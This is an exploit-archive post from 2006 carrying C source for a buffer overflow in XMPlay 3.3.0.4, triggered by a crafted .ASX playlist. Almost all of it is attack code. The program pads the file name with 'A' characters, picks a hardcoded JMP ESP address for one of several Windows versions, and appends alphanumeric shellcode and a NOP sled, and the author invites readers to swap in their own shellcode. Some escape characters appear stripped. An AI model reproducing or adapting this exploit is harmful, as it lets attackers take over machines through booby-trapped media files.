xmplay-2.txt
Posted on 22 November 2006
/* =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed .ASX files This merely executes CALC.exe but you could always add your own custom shellcode (alpha2) =============== ASX <ASX VERSION="3"> <ENTRY> <REF HREF="file://[EXPLOIT HERE]" </ENTRY> </ASX> =============== Reported Exploit Date: 11/21/2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { FILE *Exploit; char buffer[512]; /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */ unsigned char scode[] = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI" "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM" "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp" "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip" "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA"; char NOPSled[50]; char tail[] = ".midx22 "; int JMP, x; printf(" ====================================================================== "); printf("XMPlay 3.3.0.4 and prior ASX Filename Buffer Overflow Exploit "); printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com> "); printf("Usage: %s <output ASX file> <JMP> ", argv[0]); printf(" JMP Options "); printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc> "); printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc> "); printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc> "); printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256> "); printf("==================================================================== "); if (argc < 2) { printf("Invalid Number Of Arguments "); return 1; } Exploit = fopen(argv[1],"w"); if ( !Exploit ) { printf(" Couldn't Open File!"); return 1; } memset(buffer, 0, 505); memset(NOPSled, 0, 20); fputs("<ASX VERSION=x22x33x22> <ENTRY> ", Exploit); fputs("<REF HREF=x22", Exploit); fputs("file://C:\", Exploit); for (x=0;x<498;x++) { strcat(buffer, "A"); } fputs(buffer, Exploit); if (atoi(argv[2]) <= 0) { JMP = 1; } else if (atoi(argv[2]) > 4) { JMP = 1; } else { JMP = atoi(argv[2]); } switch(JMP) { case 1: printf("Using English Windows XP SP2 JMP... "); fputs("xbcx41xdbx77", Exploit); break; case 2: printf("Using English Windows XP SP1 JMP... "); fputs("xfcx18xd7x77", Exploit); break; case 3: printf("Using English Windows 2003 SP0 & SP1 JMP... "); fputs("xdcx4axd7x77", Exploit); break; case 4: printf("Using English Windows 2000 SP 4 JMP... "); fputs("x56xc2xe3x77", Exploit); break; } fputs(scode, Exploit); for (x=0;x<20;x++) { strcat(NOPSled, "x90"); } fputs(NOPSled, Exploit); fputs(tail, Exploit); fputs("</ENTRY> </ASX> ", Exploit); printf("Exploit Succeeded... Output File: %s ", argv[1]); printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com) "); printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code "); fclose(Exploit); return 0; }
